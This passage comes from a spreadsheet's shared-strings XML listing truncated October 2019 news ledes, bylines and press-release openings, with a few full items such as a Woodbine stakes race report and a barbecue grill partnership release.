    <t>America’s Road Team Captain Honored for Mentoring, Advocacy, Service OVERLAND PARK, Kan., Oct. 18, 2019 (GLOBE NEWSWIRE) -- America’s...</t>
  </si>
  <si>
    <t>HOUSTON, Oct. 3, 2019 /PRNewswire-PRWeb/ -- The PenCraft Awards' Committee has extended its final deadline for submissions to the 2019...</t>
  </si>
  <si>
    <t>DUBLIN, Oct. 18, 2019 /PRNewswire/ -- The "Tinnitus - Pipeline Insight, 2019" drug pipelines has been added to ResearchAndMarkets.com's...</t>
  </si>
  <si>
    <t>Mary Gilbert</t>
  </si>
  <si>
    <t>Analysts expect Triumph Bancorp, Inc. (NASDAQ:TBK) to report $0.57 EPS on October, 16.They anticipate $0.06 EPS change or 11.76 % from last...</t>
  </si>
  <si>
    <t>Northern Trust Corp boosted its holdings in shares of NOW Inc (NYSE:DNOW) by 2.6% in the second quarter, according to its most recent...</t>
  </si>
  <si>
    <t>By Riley Krause</t>
  </si>
  <si>
    <t>See photos images Skip to next photo 1/1 Show caption 1/1 A Putney man is looking to put his road on the map the best way he knows how...</t>
  </si>
  <si>
    <t>Alasdair McDonald</t>
  </si>
  <si>
    <t>Nunawading man David Chen (left) leaves Bega Local Court after being sentenced on Tuesday, October 15. Picture: Alasdair McDonald A...</t>
  </si>
  <si>
    <t>Shares of Polarityte Inc (PTE) are on watch as the Tenkan Line has moved above the Kijun line, indicating positive momentum for the...</t>
  </si>
  <si>
    <t>Joe Harris, executive vice-president of Westway Feed Products, recently was named the 2019 Liquid Feed Hall of Fame inductee by the...</t>
  </si>
  <si>
    <t>CLEARWATER, Fla., Oct. 10, 2019 (GLOBE NEWSWIRE) -- On October 5th the Foundation for a Drug-Free World held its 4th annual “Night for a...</t>
  </si>
  <si>
    <t>Car rental is a service which provides car and automobiles on rent for short periods of time. This time period generally ranges from few...</t>
  </si>
  <si>
    <t>STEVEN M. SIPPLE Lincoln Journal Star</t>
  </si>
  <si>
    <t>Things I know, and things I think I know: Nebraska football coach Scott Frost shed a sliver of light Saturday on how he goes about his work...</t>
  </si>
  <si>
    <t>Jamaica weather forecast at 5am Tuesday, October 15, 2019 by the Meteorological Service Division. SIGNIFICANT FEATURE… A weak trough across...</t>
  </si>
  <si>
    <t>Pete Carroll likes what he’s been seeing from his Seahawks, though not everything is in place yet. They could pass a huge test in a rare...</t>
  </si>
  <si>
    <t>By Jennifer McDanielThe Ottawa Herald</t>
  </si>
  <si>
    <t>OTTAWA — It’s been a bit of a whirlwind since Jennifer and Jeremiah Bentley, of Richmond, opened their new business, Farmhouse Boutique, in...</t>
  </si>
  <si>
    <t>Data firm Moody’s Analytics used three different models to determine the results of the 2020 election and thus far, they are predicting...</t>
  </si>
  <si>
    <t>Temperatures throughout the South are sweltering and are swiftly growing drought situations. Thermometers in lots of cities topped a...</t>
  </si>
  <si>
    <t>Antonio Guterres, Secretary-General of the United Nations delivers a speech at the C40 World Mayors Summit in Copenhagen, Denmark, Friday...</t>
  </si>
  <si>
    <t>By Elvira Pollina and Giuseppe Fonte</t>
  </si>
  <si>
    <t>By Elvira Pollina and Giuseppe Fonte MILAN/ROME (Reuters) - London Stock Exchange is mulling an overhaul of its Italian business MTS...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — Scientists say the globe sizzled to a record tying hot month in September, driven partly by a sweaty United States. The...</t>
  </si>
  <si>
    <t>TOKYO (AP) - The Latest on Day 19 at the Rugby World Cup (all times local): 3 p.m. Australia has made 10 changes to the starting lineup...</t>
  </si>
  <si>
    <t>Baseball Equipment Market in the US 2019-2023 | Increasing Customization and Product Innovation to Boost Growth | Technavio</t>
  </si>
  <si>
    <t>This bulletin applies to 2018 Dodge Caravan vehicles built on or after Dec. 10, 2017, and on or before Jan. 22, 2018. The customer may note...</t>
  </si>
  <si>
    <t>CHICAGO (AP) — A Chicago judge could decide this week whether the special prosecutor investigating possible conflicts of interest in Jussie...</t>
  </si>
  <si>
    <t>Mackenzie Financial Corp decreased its holdings in shares of Burlington Stores Inc (NYSE:BURL) by 19.4% during the 2nd quarter, according...</t>
  </si>
  <si>
    <t>BISHOPSGATE, LONDON / ACCESSWIRE / October 10, 2019 / Following recent media reports regarding protests in Ecuador the Board of SolGold...</t>
  </si>
  <si>
    <t>Accenture (NYSE: ACN) today announced that Gartner, Inc. has given the Accenture Life Insurance &amp; Annuity Platform (ALIP) the highest score...</t>
  </si>
  <si>
    <t>Neil Murphy</t>
  </si>
  <si>
    <t>Google may be forced to pay out billions to UK users after a mass legal action was granted against the tech giant over allegations it...</t>
  </si>
  <si>
    <t>Matt Dennien</t>
  </si>
  <si>
    <t>A recent report into sediment raking in kanamaluka/the Tamar River estuary should be a "catalyst" to focus on the future of the...</t>
  </si>
  <si>
    <t>More than 500 years ago, they faced a bleak choice: convert to Catholicism or be burned at the stake. The only other option was exile. For...</t>
  </si>
  <si>
    <t>TORONTO, October 5, 2019 – Curlin’s Voyage, interfered with by an erratic Skygaze in early stretch, finished second but was promoted to the top spot in Saturday’s Grade 3, $145,250 Mazarine Stakes at Woodbine Racetrack. The stewards hung up the inquiry sign immediately after Skygaze hit the wire in a time 1:43.30 for the 1 1/16-mile race for two-year-old fillies. They were looking into not only the stretch incident but also the run around the first turn, when Skygaze dropped over sharply and forced Take Charge Eh to take up. Eurico Rosa da Silva, aboard Curlin’s Voyage, and David Moran, rider of third-place finisher Take Charge Eh, also lodged claims of foul and the stewards upheld both complaints, with Skygaze being placed third. “I think this filly is still very immature,” said Curlin’s Voyage’s conditioner Josie Carroll. “She’s still figuring out how to run, as you saw down the lane when that horse sort of came in front of her and it took her a long time to get her momentum back. She’s still figuring it all out. “I think she settled better than the last time, but I think she’s still a filly with a bright future that has a lot to figure out.” Take Charge Eh was first to show but was quickly joined by Skygaze, who committed her first misdeed when moving to the rail without sufficient clearance. Skygaze maintained command through a quarter in :23.87 and a half in :48.20, and six furlongs in 1:12.66 while pressed by Take Charge Eh and longshot Glorious Gizmo. Take Charge Eh had taken a seat on the rail with Curlin’s Voyage poised to strike from fourth on the outside. Curlin’s Voyage launched her move around the final turn and looked to have Skygaze at her mercy when they straightened out for home. Skygaze, however, veered out sharply, bumping with Curlin’s Voyage and forcing that one to switch paths to race inside her erratic rival. Skygaze led by 1 ½ lengths at the stretch call and by two at the wire but there seemed to be little doubt about his ultimate fate. Take Charge Eh ended another 5 ¼ lengths back in third prior to be moving up to the runner-up spot, with Special Honor closing from last in the field of six to grab fourth money. Roman d’Oro and Glorious Gizmo completed the order of finish. Curlin’s Voyage became the 13th stakes winner of the meeting for leading rider Da Silva. A homebred who races for Hill ‘n’ Dale Equine Holdings Inc., and Windsor Boys Racing, Curlin’s Voyage was making her fourth career start and coming off an impressive maiden win at 1 mile and 70 yards. The Ontario-bred filly’s first two outings came in sprint stakes, as she ran third in the Shady Well after debuting with a second-place finish against males in the Victoria. A logical spot for the Curlin-Atlantic Voyage filly’s next engagement would be the $225,000 Princess Elizabeth Stakes, a 1 1/16 mile race restricted to Canadian-bred two-year-old fillies here October 26. “Certainly that’s a race that I’m sure we’ll be looking at,” said Carroll. “(Hill ‘n’ Dale master) John Sikura breeds such a good horse that it would be really nice to get something like that done for him.” Curlin’s Voyage returned $4.20, $2.70 and $2.30 and fronted a $17.60 3-1 exactor with 7-1 chance Take Charge Eh ($5.70, $3.80). Skygaze ($3), the 2-1 second choice, completed a 3-1-2 exacta of $44.30 with Special Honor rounding out a 3-1-2-5 superfecta worth $51.15 for $1. Live Thoroughbred racing resumes at Woodbine on Sunday afternoon with the $225,000 Cup &amp; Saucer Stakes headlining the 1:05 p.m. program.</t>
  </si>
  <si>
    <t>If you’ve seen an ad slamming Democrats’ impeachment effort against President Donald Trump while browsing Facebook over the past several...</t>
  </si>
  <si>
    <t>by Candice Dyer;October/November 2019</t>
  </si>
  <si>
    <t>A crackerjack quilter follows a pattern of Southern storytelling</t>
  </si>
  <si>
    <t>NARENDRA SHRESTHA</t>
  </si>
  <si>
    <t>Descriere: epa07894303 A view of a misty field in Khokana, Nepal, 04 October 2019. The village of Khokana is one of the tentative nominees...</t>
  </si>
  <si>
    <t>Economists argue that low rates will continue to prop up the housing market as the economy slows down, but it’s not clear how long that...</t>
  </si>
  <si>
    <t>AUSTIN, Texas, Oct. 15, 2019 /PRNewswire/ -- Jey Iyempandi, the founder of CodeWizardsHQ, announced today the company's curriculum...</t>
  </si>
  <si>
    <t>Jaden, Willow Smith Embark on Co-Headlining Tour</t>
  </si>
  <si>
    <t>Manufacturing journalist, TR Cutler recently profiled Katana cloud-based manufacturing software as best-suited for small manufacturers. The...</t>
  </si>
  <si>
    <t>Kroll Bond Rating Agency (KBRA) assigns a long-term rating of AA+ and Stable Outlook to the North Slope Borough, Alaska General Obligation...</t>
  </si>
  <si>
    <t>Christie Tate</t>
  </si>
  <si>
    <t>Neymar went off injured 12 minutes into Brazil's 1-1 draw with Nigeria in a friendly in Singapore on Sunday. With the team billed to play...</t>
  </si>
  <si>
    <t>Medium Voltage Transformer Sales to Ramp Up as Urbanization and Power Generation Move on an Upward Swing: FMI Valley Cottage, United...</t>
  </si>
  <si>
    <t>Brad Williams</t>
  </si>
  <si>
    <t>FOX CROSSING, WI (WTAQ) - Fox Crossing Police are trying to find the owners of chickens that were left behind. Police say a caller noticed...</t>
  </si>
  <si>
    <t>Dublin, Oct. 04, 2019 (GLOBE NEWSWIRE) -- The "Collaborative Robots - Market Analysis, Trends, and Forecasts" report has been added...</t>
  </si>
  <si>
    <t>Tanya9 (Posted by)</t>
  </si>
  <si>
    <t>New official photos have emerged of North Korea leader Kim Jong-Un riding a white horse through the snow. The photos, released by state...</t>
  </si>
  <si>
    <t>Elizabeth Leonard</t>
  </si>
  <si>
    <t>When Cameron Douglas was released from prison in 2016 after nearly eight years behind bars for drug-related offenses, his dad, Hollywood...</t>
  </si>
  <si>
    <t>wsfurlan/iStock(TAMPA, Fla.) -- A child died after being left inside a hot car for hours on Monday in central Florida, marking the fifth...</t>
  </si>
  <si>
    <t>VAN NUYS, Calif., Oct. 2, 2019 /PRNewswire/ -- CannaSafe , California's leading accredited cannabis testing laboratory, announced today it...</t>
  </si>
  <si>
    <t>GEMINI Phase 3 placebo-controlled trial of AXS-05 in MDD on track for readout of topline results in 4Q 2019 STRIDE-1 Phase 3 trial of...</t>
  </si>
  <si>
    <t>CAMPBELL, Calif., Oct. 08, 2019 (GLOBE NEWSWIRE) -- KULR Technology Group, Inc. (OTCQB: KULR), (the “Company” or “KULR”), announced that...</t>
  </si>
  <si>
    <t>SAN FRANCISCO (AP) — The Labor Department says it has reached a $5 million settlement with chip maker Intel Corp. over allegations of pay...</t>
  </si>
  <si>
    <t>LAREDO, TX (KGNS) - A citizen from Tamaulipas, Mexico now faces up to life in prison after pleading guilty to conspiracy and importation...</t>
  </si>
  <si>
    <t>Posted by Aly Delp</t>
  </si>
  <si>
    <t>SALEM TWP., Pa. (EYT) – Clarion-based State Police said a passenger car operated by an 89-year-old Knox man collided with an amish buggy in...</t>
  </si>
  <si>
    <t>Dave Evans at Goodison Park</t>
  </si>
  <si>
    <t>The Hammers conceded a goal in each half to crash at Goodison Park</t>
  </si>
  <si>
    <t>BRUSSELS (AP) — The Latest on migrants trying to reach Europe (all times local): 5:30 p.m. France's European affairs minister says around...</t>
  </si>
  <si>
    <t>Aon’s Pension Risk Survey shows increase in delegated solutions, diversification TORONTO, Oct. 17, 2019 (GLOBE NEWSWIRE) -- Entering 2019...</t>
  </si>
  <si>
    <t>LOS ANGELES — Thousands of pairs of Nike knockoffs were seized at the Los Angeles-Long Beach ports complex recently in a shipment arriving...</t>
  </si>
  <si>
    <t>Donna Brown</t>
  </si>
  <si>
    <t>US Bancorp DE lifted its stake in Orthopediatrics Corp (NASDAQ:KIDS) by 9.5% during the second quarter, according to the company in its...</t>
  </si>
  <si>
    <t>Meghan Bartels, Space.com</t>
  </si>
  <si>
    <t>The first colour image of the Comet C/2019 Q4 (Borisov), which astronomers believe was born in another solar system, was captured by the...</t>
  </si>
  <si>
    <t>By Tony Moore</t>
  </si>
  <si>
    <t>Transport Minister Mark Bailey has given the go-ahead for a three-month trial of allowing pet dogs to travel on Brisbane CityCats and...</t>
  </si>
  <si>
    <t>The prestigious Consumer World Awards program honors excellence in all areas of the consumer industry in companies and their leadership....</t>
  </si>
  <si>
    <t>WINDSOR LOCKS, CONN. — Officials say a World War II-era bomber plane has crashed just outside Bradley...</t>
  </si>
  <si>
    <t>West Midlands Police is the worst force in the country when it comes to recording complaints against officers in a timely manner.</t>
  </si>
  <si>
    <t>Dublin, Oct. 15, 2019 (GLOBE NEWSWIRE) -- The "Li-ion Battery - Market Analysis, Trends, and Forecasts" report has been added to...</t>
  </si>
  <si>
    <t>Andrew Walz</t>
  </si>
  <si>
    <t>Whitehaven Coal Ltd (ASX:WHC)’s stock price crossed above its 50-day moving average during trading on Monday . The stock has a 50-day...</t>
  </si>
  <si>
    <t>ANCHORAGE, Alaska (AP) — The Anchorage Assembly will let voters decide whether the city should allow on-site smoking in retail marijuana...</t>
  </si>
  <si>
    <t>WASHINGTON, Oct. 1, 2019 /PRNewswire/ -- James Manning has been appointed as the new Executive Director of the Presidents Forum, an...</t>
  </si>
  <si>
    <t>Russian Prime Minister Dmitry Medvedev says Moscow will help Cuba find other supplies of oil and petroleum products. Medvedev pledged to...</t>
  </si>
  <si>
    <t>Farzad Khan</t>
  </si>
  <si>
    <t>Streaming service Waipu.tv has launched a new Turkish package for the German market, creating a new option for Turkish speakers in the...</t>
  </si>
  <si>
    <t>LOS ANGELES, Oct. 3, 2019 /PRNewswire/ -- Southern California Gas Co. (SoCalGas) today applauded the more than 100 local governments across...</t>
  </si>
  <si>
    <t>The Broadway production of Moulin Rouge! The Musical will come to the UK in 2021 in London’s West End. The jukebox musical based on the...</t>
  </si>
  <si>
    <t>Murray McCormick, Regina Leader-Post                        More from Murray McCormick, Regina Leader-Post</t>
  </si>
  <si>
    <t>Ed Gainey’s first interception of the 2019 season came Saturday against the Toronto Argonauts.</t>
  </si>
  <si>
    <t>Edison International (NYSE:EIX): WHAT: Third Quarter 2019 Financial Results WHEN: Tuesday, October 29, 2019 TIME: 1:30 p.m. (Pacific...</t>
  </si>
  <si>
    <t>Paris (AFP) - Naomi Osaka's win over world number one Ashleigh Barty in Beijing at the weekend lifted the Japanese player back into the top...</t>
  </si>
  <si>
    <t>Assunta Ng</t>
  </si>
  <si>
    <t>By Assunta Ng NORTHWEST ASIAN WEEKLY</t>
  </si>
  <si>
    <t>Albany, New York, Oct. 11, 2019 (GLOBE NEWSWIRE) -- According to a recent report by Transparency Market Research, the global adult diaper...</t>
  </si>
  <si>
    <t>Carla Hildebrandt</t>
  </si>
  <si>
    <t>WA Police push state government for cold case reward</t>
  </si>
  <si>
    <t>abs-cbn</t>
  </si>
  <si>
    <t>MANILA, Philippines — Lyceum of the Philippines University poured it on late to turn back Mapua University, 77-71, and bolster its bid for...</t>
  </si>
  <si>
    <t>Global "GDI System Market" (2019), Industry Research Report is an in-depth study on the current state of the Global GDI System industry....</t>
  </si>
  <si>
    <t>Starting this Thursday, Oct 10, you can watch a new television series featuring Richmond artists and arts groups on VPM PBS at 8:30 p.m....</t>
  </si>
  <si>
    <t>We’re only a few months away from Star Wars taking over the entertainment medium, from The Mandalorian, which will debut on Disney+ when...</t>
  </si>
  <si>
    <t>Fitbit Inc is developing a method to detect irregular heart rhythm in time through a partnership with Bristol-Myers Squibb-Pfizer Alliance,...</t>
  </si>
  <si>
    <t>Liam Rudden</t>
  </si>
  <si>
    <t>Rock on! A brand new production of Queen and Ben Elton’s smash hit musical We Will Rock You is coming to Edinburgh - Edinburgh Evening News</t>
  </si>
  <si>
    <t>ORRVILLE, Ohio, Oct. 3, 2019 /PRNewswire/ -- Out of an abundance of caution, The J. M. Smucker Company (NYSE: SJM) today announced a...</t>
  </si>
  <si>
    <t>SAN JOSE, Calif. , Oct. 16, 2019 /PRNewswire/ -- Designers can now achieve ASIL-D compliance for automotive applications using just a...</t>
  </si>
  <si>
    <t>John Hanna, Ap Political Writer</t>
  </si>
  <si>
    <t>TOPEKA, Kan. (AP) — One of four Kansas legislators who made headlines last year by defecting from the Republican Party is running for the...</t>
  </si>
  <si>
    <t>A UK Government lawyer has told judges the courts would have to “deal with” what happens “in some way” if the Prime Minister breached an...</t>
  </si>
  <si>
    <t>By GREGORY KATZ and MIKE CORDER Associated Press</t>
  </si>
  <si>
    <t>LONDON (AP) — British Prime Minister Boris Johnson, who has lost every important vote in Parliament since taking office, faces a titanic...</t>
  </si>
  <si>
    <t>The upcoming Oscars will be awarded on February 9, 2020, two weeks earlier than when the Oscars took place in 2019. An earlier date means...</t>
  </si>
  <si>
    <t>By Kevin Myrick kmyrick@polkstandardjournal.com</t>
  </si>
  <si>
    <t>A win last Friday night was just what the Cedartown Bulldogs needed as they head into a week off from the region schedule. The 3-4 Bulldogs...</t>
  </si>
  <si>
    <t>Liverpool manager Jurgen Klopp believes midfielder Naby Keita has taken a big step forward after getting to grips with the English language.</t>
  </si>
  <si>
    <t>People living in Northern California have suffered enough from raging wildfires. Now, they must live without electric power. Pacific Gas &amp;...</t>
  </si>
  <si>
    <t>RICHMOND, Va., Oct. 14, 2019 (GLOBE NEWSWIRE) -- The board of directors of The Brink’s Company (NYSE:BCO) today declared a regular...</t>
  </si>
  <si>
    <t>SEATTLE, Oct. 10, 2019 /PRNewswire/ -- Optio3, the leader in workflow automation and hyperscale cloud solutions for operationalizing...</t>
  </si>
  <si>
    <t>NEW YORK (AP) — The latest on developments in financial markets (all times local): 4 p.m. Stocks are closing sharply higher Friday as the...</t>
  </si>
  <si>
    <t>HONG KONG, Oct. 8, 2019 /PRNewswire/ -- Save the date! Cosmoprof Asia 2019, the reference event for beauty companies and professionals in...</t>
  </si>
  <si>
    <t>Medical device maker Abbott Laboratories reported quarterly revenue that fell just short of Wall Street estimates and trimmed the upper end...</t>
  </si>
  <si>
    <t>Lightbeam Health Solutions, the leader in end-to-end population health management solutions and services, announced that Accountable Care...</t>
  </si>
  <si>
    <t>Herbalife Nutrition (NYSE:HLF), a premier global nutrition company, today introduced Immunity Essentials to support and strengthen immune...</t>
  </si>
  <si>
    <t>Aston Villa secured a last-gasp victory over Brighton as Matt Targett’s first goal for the club ended the resilience of 10-man Brighton....</t>
  </si>
  <si>
    <t>THOMPSON FALLS, MT / ACCESSWIRE / October 7, 2019 / United States Antimony Corporation ("USAC")(NYSE American:UAMY): KEY HIGHLIGHTS United...</t>
  </si>
  <si>
    <t>Source: Tim Mosenfelder / Getty Tyler, The Creator And Nardwuar Link Up For Another Interview When two music nerds as passionate as...</t>
  </si>
  <si>
    <t>AT&amp;T and Elliott Management are talking about issues the activist hedge fund raised last month when it pushed for change at the U.S....</t>
  </si>
  <si>
    <t>Rebecca Marano</t>
  </si>
  <si>
    <t>Man drove into fast flowing North Yorkshire river because his "SatNav said this way" - Whitby Gazette</t>
  </si>
  <si>
    <t>Pop star Rihanna said she turned down performing in this year’s Super Bowl halftime show to stand in solidarity with NFL quarterback Colin...</t>
  </si>
  <si>
    <t>The following property transfers took place in Westport for the period of Sept. 16 to Sept. 20. 23 Covlee Drive Price: $3,000,000...</t>
  </si>
  <si>
    <t>DURHAM, N.C. (AP) — Duke hopes to continue its dominance of Georgia Tech. The Blue Devils (3-2, 1-1 Atlantic Coast Conference) look for...</t>
  </si>
  <si>
    <t>The teenager acquitted of murdering Manchester Grammar School pupil Yousef Makki in a leafy Cheshire village can be named today as Joshua...</t>
  </si>
  <si>
    <t>As Manor Park school gets set to pave greenspace to make way for a teacher’s parking lot and more portables, other area schools sit half...</t>
  </si>
  <si>
    <t>Pete Smith</t>
  </si>
  <si>
    <t>Test paceman Mitchell Starc again failed to fire, though the remainder of the NSW attack has the Blues within sight of victory after day...</t>
  </si>
  <si>
    <t>When Mike Castellano patrols the beaches of the New Jersey Shore, he is no longer surprised to find discarded vape pens and spent “e-juice”...</t>
  </si>
  <si>
    <t>BEIJING (AP) — An annual survey of China's wealthiest businesspeople found they got richer this year despite a tariff war with Washington...</t>
  </si>
  <si>
    <t>The United States and China agreed on Friday to the first phase of a trade deal covering agricultural purchases, currency and some aspects...</t>
  </si>
  <si>
    <t>An article published in Experimental Biology and Medicine (Volume 244, Issue 13, October, 2019)...</t>
  </si>
  <si>
    <t>By KRISTIE RIEKEN AP Sports Writer</t>
  </si>
  <si>
    <t>Gerrit Cole carried his splendid September into an outstanding October and Alex Bregman handed fans chanting MVP the mighty swing they...</t>
  </si>
  <si>
    <t>Joselito Villero</t>
  </si>
  <si>
    <t>BRAWLEY — Contestants for the 2019 Brawley Cattle Call Queen royalty competed in horsemanship Saturday morning, October 12, at Griggs Arena...</t>
  </si>
  <si>
    <t>(CNN) - Last month was tied as the second warmest September on record in the contiguous United States, tied with September 2015. According...</t>
  </si>
  <si>
    <t>BERLIN (AP) — The German government said Wednesday it has called an international meeting over Shell's refusal to dismantle old oil rigs...</t>
  </si>
  <si>
    <t>A fast-moving wildfire fueled by dry Pacific winds engulfed houses, roads and wooded areas near Los Angeles on Friday morning, killing at...</t>
  </si>
  <si>
    <t>LA MESA, Calif., Oct. 08, 2019 /PRNewswire-PRWeb/ -- Halloween is all treats and no tricks at Grossmont Center, where two popular annual...</t>
  </si>
  <si>
    <t>HELSINKI (AP) — George Clooney says he was appalled U.S. President Donald Trump partly justified the decision to withdraw U.S. troops from...</t>
  </si>
  <si>
    <t>(Family Features) Few traditions are as popular on Halloween as picking out the perfect costume. This haunting season, think outside the...</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 04, 2019 (GLOBE NEWSWIRE) -- Center Coast Brookfield MLP &amp; Energy Infrastructure Fund (NYSE: CEN) (the “Fund”) today...</t>
  </si>
  <si>
    <t>Pune, Oct. 14, 2019 (GLOBE NEWSWIRE) -- The global High-Efficiency Particulate Air Filter Market will derive growth from the exceptional...</t>
  </si>
  <si>
    <t>Things I know, and things I think I know: As disheartening as Saturday night was for the Nebraska football team, many old-school Husker...</t>
  </si>
  <si>
    <t>President Donald Trump on Monday launched a harsh attack on NATO ally Turkey, threatening to destroy its economy if Ankara takes a planned...</t>
  </si>
  <si>
    <t>“Tea Packaging Market – 2019-2025”A new market study, titled “Discover Global Tea Packaging Market By Upcoming Trends, Growth Drivers and...</t>
  </si>
  <si>
    <t>TEL AVIV, Israel, Oct. 10, 2019 /PRNewswire/ -- Therapix Biosciences Ltd. ("Therapix" or the "Company") (NASDAQ: TRPX), a specialty,...</t>
  </si>
  <si>
    <t>LAFAYETTE, La. (AP) — Zac Thomas scored twice on 7-yard sneaks, the last coming with 1:56 remaining, and Appalachian State beat...</t>
  </si>
  <si>
    <t>Fitbit Inc (NYSE:FIT) has received an average rating of “Hold” from the eight research firms that are presently covering the company,...</t>
  </si>
  <si>
    <t>October 2 2019 The Duke and Duchess of Sussex were all smiles as they began the final day of their Africa tour, which has been overshadowed...</t>
  </si>
  <si>
    <t>A man has been warned "all options are open" after he admitted possessing more than 11,000 indecent images of children.</t>
  </si>
  <si>
    <t>Russian Vladimir Putin has arrived in the United Arab Emirates on his first visit to the oil-rich nation in over a decade. Putin landed...</t>
  </si>
  <si>
    <t>Casey Walker</t>
  </si>
  <si>
    <t>Equities research analysts expect Ooma Inc (NYSE:OOMA) to report sales of $38.22 million for the current quarter, according to Zacks. Three...</t>
  </si>
  <si>
    <t>Photo: PRWeb...</t>
  </si>
  <si>
    <t>Kerry Spencer</t>
  </si>
  <si>
    <t>(4:45 a.m. EST) -- Royal Caribbean Cruises Ltd. has confirmed that its much-loved Baltimore-based Grandeur of the Seas -- known as "Lady G"...</t>
  </si>
  <si>
    <t>MEMPHIS, Tenn., Oct. 8, 2019 /PRNewswire-PRWeb/ -- With the 4th quarter looming, many businesses are looking at ways to finish the year...</t>
  </si>
  <si>
    <t>England “might well end up with mandatory” vaccines , the outgoing Chief Medical Officer has said, as she recalled looking after two...</t>
  </si>
  <si>
    <t>By Terje Solsvik OSLO (Reuters) - Norway's currency weakened to an all-time low against the euro on Thursday, costing as much as 10.1800...</t>
  </si>
  <si>
    <t>Jeonju, a UNESCO Creative City of Gastronomy, will host the 2019 Jeonju Bibimbap Festival, a fiesta of traditional Korean taste and charm....</t>
  </si>
  <si>
    <t>Food and Beverage PR News/ -- Sunterra Outdoor, a San Antonio, Texas-based company that manufactures heavy duty barbecue smokers, grills, and pizza ovens that use wood and charcoal for fuel, now partners with Certified Piedmontese for its Argentine, Argentine Brasero, and Santa Maria grills. Sunterra Outdoors is an NSF certified iron-forged outdoor grills feature large fireboxes and cooking surfaces that can be raised or lowered using a unique hand crank configuration. Through a partnership with Certified Piedmonteseâa Lincoln, Nebraska-based beef companyâthose who purchase a Sunterra Outdoor grill at SunterraOutdoor.com and use code PIEDMONTESE receive a discount on Sunterra Grills and a free Certified Piedmontese beef gift box with their purchase. Grill sponsor Sunterra Outdoor is going to grill it up at Certified Piedmontese at the Las Vegas Food &amp; Wine Festival this week October 4 &amp; 5. All proceeds donated to the American Cancer Society Critical Care Comics. About Sunterra Outdoor Sunterra Outdoor is a company that shares in the passion, enjoyment, and satisfaction customers gain from using its high-quality, heavy duty barbecue smokers, grills, and pizza ovens that are handcrafted by metal artisans. Sunterra Outdoor offers product lines to suit customers' preferred barbecue and grilling style, including Argentine grills, Argentine Brasero grills, and Santa Maria grills, which feature unique hand crank configurations that lift or lower the grill grates to the desired distance from the heat source. Sunterra Outdoor is dedicated to designing and crafting the most reliable and long lasting outdoor grilling products available. Learn more at SunterraOutdoor.com and SunterraoutdoorProseries.com About Certified Piedmontese Certified Piedmontese is a healthier beef option that doesn't sacrifice flavor or tenderness. With fewer calories, less fat, and higher protein per ounce than beef from other breeds, it's an ideal source of lean protein for a healthy diet. Certified Piedmontese cattle are raised responsibly on family ranches across the Midwest through a ranch-to-fork process that ensures traceability, environmental sustainability, humane animal handling, and responsible resource management at every step. Progressive stockman ship values such as low stress handling protocols and the elimination of added growth hormones, antibiotics, and animal by-products ensure healthier cattle and higher-quality beef for consumers who won't settle for anything less. Learn more at Piedmontese.com.</t>
  </si>
  <si>
    <t>ERMProtect, a leading cybersecurity firm, today launched Stingray, an easy-to-use, fully automated phishing simulation tool that helps...</t>
  </si>
  <si>
    <t>Content warning: The following contains disturbing images.</t>
  </si>
  <si>
    <t>DETROIT, Oct. 14, 2019 /PRNewswire/ -- Global automotive industry stakeholders will gather in Detroit on October 31-November 1, 2019 for...</t>
  </si>
  <si>
    <t>BY JIM HERRIN</t>
  </si>
  <si>
    <t>The Putnam County Library Board is moving ahead with plans to update the look of the library's Cookeville building and of the branches in...</t>
  </si>
  <si>
    <t>tiazanne (Posted by)</t>
  </si>
  <si>
    <t>This league is a damn joke! I just got fined $21k for this hit, I signed up to play football not two hand touch. Bullshit! I don’t give a...</t>
  </si>
  <si>
    <t>Harland and Wolff employees have returned to work after the sale of the closure-threatened shipyard.</t>
  </si>
  <si>
    <t>BELLEVUE, Wash., Oct. 1, 2019 /PRNewswire/ -- For the past 14 years, the Kemper Freeman family and The Bellevue Collection host the annual...</t>
  </si>
  <si>
    <t>Max Channon</t>
  </si>
  <si>
    <t>The five most lethal aircraft carriers in history revealed HMS Prince of Wales has an illustrious predecessor... A Royal Navy warship has...</t>
  </si>
  <si>
    <t>10TV Web Staff</t>
  </si>
  <si>
    <t>ROSS COUNTY, Ohio — Several departments in Ross County are investigating a rash of overdoses. The Ross County Health District and...</t>
  </si>
  <si>
    <t>Muscle Mass gelding Armagedon Seelster went right to the lead and took the shortest way home in the $18,000 featured trot on Thursday afternoon at Harrah’s Philadelphia, but he had to be good late to hold off two threatening foes for a neck triumph in 1:55.1. Pat Berry sent the winner to the front before the :27.4 quarter and didn’t receive great pressure through middle splits (:56.4 and 1:26). Sylvesteramerica IT closed hard from fourth to finish second, while the pocket-sitter, Wisenheimer, finished a close third. Ron Coyne Jr. conditions Armagedon Seelster for Ron Coyne Stables Inc., Blair Corbeil, and Mike Mcallister. Driver George Napolitano Jr. recorded five wins on the afternoon card, which brought his career total to 9,997. When he reaches the milestone 10,000th win, he will be the 18th driver in North American history to reach five figures in driving wins, and he currently ranks 11th among active drivers. Napolitano is booked on eight drives for the Friday card at the riverside oval, among them three morning line favourites. (With files from the PHHA / Harrah’s Philadelphia)</t>
  </si>
  <si>
    <t>Tom Froemming of Twins Daily</t>
  </si>
  <si>
    <t>Adding pitching will be big, but so will playing better defense.</t>
  </si>
  <si>
    <t>Michael Larabel</t>
  </si>
  <si>
    <t>Igalia is working on supporting OpenGL ES' GLSL marking of variables as "mediump" when the precision involving those variables can be...</t>
  </si>
  <si>
    <t>The Fort Lauderdale International Boat Show (FLIBS), the largest in-water boat show in the world, with its ever expanding fleet of...</t>
  </si>
  <si>
    <t>Ladenburg Thalmann Financial Services Inc. reduced its position in shares of Campbell Soup (NYSE:CPB) by 3.1% in the 2nd quarter, according...</t>
  </si>
  <si>
    <t>Travelers could end up paying higher fares if the U.S. goes ahead with a planned 10% tariff on European aircraft after winning a subsidy...</t>
  </si>
  <si>
    <t>OSLO, Norway, Oct. 7, 2019 /PRNewswire/ -- Nordic Nanovector ASA (OSE: NANO) announces that it has signed a long-term global supply...</t>
  </si>
  <si>
    <t>Ripon Advance News Service</t>
  </si>
  <si>
    <t>U.S. Sen. John Hoeven (R-ND) on Oct. 1 spotlighted his efforts to expand improved access to healthcare for America’s military veterans...</t>
  </si>
  <si>
    <t>Porter went for 16 points (7-13 FG, 2-5 3Pt, 0-1 3Pt), eight assists, seven rebounds and one block across 22 minutes during the Bulls'...</t>
  </si>
  <si>
    <t>Jill Barker, Special to Montreal Gazette</t>
  </si>
  <si>
